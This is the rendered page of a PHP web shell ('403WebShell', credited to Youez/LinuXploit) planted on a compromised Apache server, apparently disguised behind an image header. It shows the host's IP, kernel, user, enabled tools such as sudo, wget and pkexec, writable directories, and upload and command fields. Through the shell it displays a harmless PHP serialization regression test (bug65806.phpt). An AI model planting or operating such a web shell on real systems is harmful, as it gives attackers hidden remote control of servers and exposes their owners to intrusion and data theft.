????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 216.73.216.191
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /proc/self/root/home/b8009/php-5.6.22/ext/standard/tests/serialize/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /proc/self/root/home/b8009/php-5.6.22/ext/standard/tests/serialize/bug65806.phpt
--TEST--
Bug #65806 (unserialize fails with object which is referenced multiple times)
--FILE--
<?php
class myObjA {}
class myObjB {
    public $attrA;
    public $attrB;
}
class myObjC {
    public $attrC;
    public $attrD;
}
class myList {
    private $_serialized;
    private $_obj;

    public function __construct($obj)
    {
        $this->_obj = $obj;
        $this->_serialized = serialize($this->_obj);
    }
    public function get()
    {
        return $this->_obj;
    }
    public function __sleep()
    {
        $this->_serialized = serialize($this->_obj);
        return array(
            "\0" . __CLASS__ . "\0_serialized",
        );
    }
    public function __wakeup()
    {
		$this->_obj = unserialize($this->_serialized);
	}
}

echo "SCRIPT START" . PHP_EOL;

$objA = new myObjA();
$objB = new myObjB();
$objC = new myObjC();

$objB->attrA = new ArrayIterator();
$objB->attrB = $objA;

$objC->attrC = $objB;
$objC->attrD = $objA;

$list = new myList($objC);

echo 'check ' . check($list->get()) . PHP_EOL;

echo "start serialize/unserialize" . PHP_EOL;
$newList = unserialize(serialize($list));
echo "finish serialize/unserialize" . PHP_EOL;

//after unserialize the property myObjC::attrD is null instead of expected object
echo 'check ' . check($newList->get()) . PHP_EOL;

echo "SCRIPT END" . PHP_EOL ;

function check(myObjC $obj) {

    if (!is_object($obj->attrC)) {
        return 'failed (myObjC::attrC => ' . var_export($obj->attrC, true) . ')';
    }
    if (!is_object($obj->attrD)) {
        return 'failed (myObjC::attrD => ' . var_export($obj->attrD, true) . ')';
    }
    return 'successful';
}
?>
--EXPECT--
SCRIPT START
check successful
start serialize/unserialize
finish serialize/unserialize
check successful
SCRIPT END

Youez - 2016 - github.com/yon3zu
LinuXploit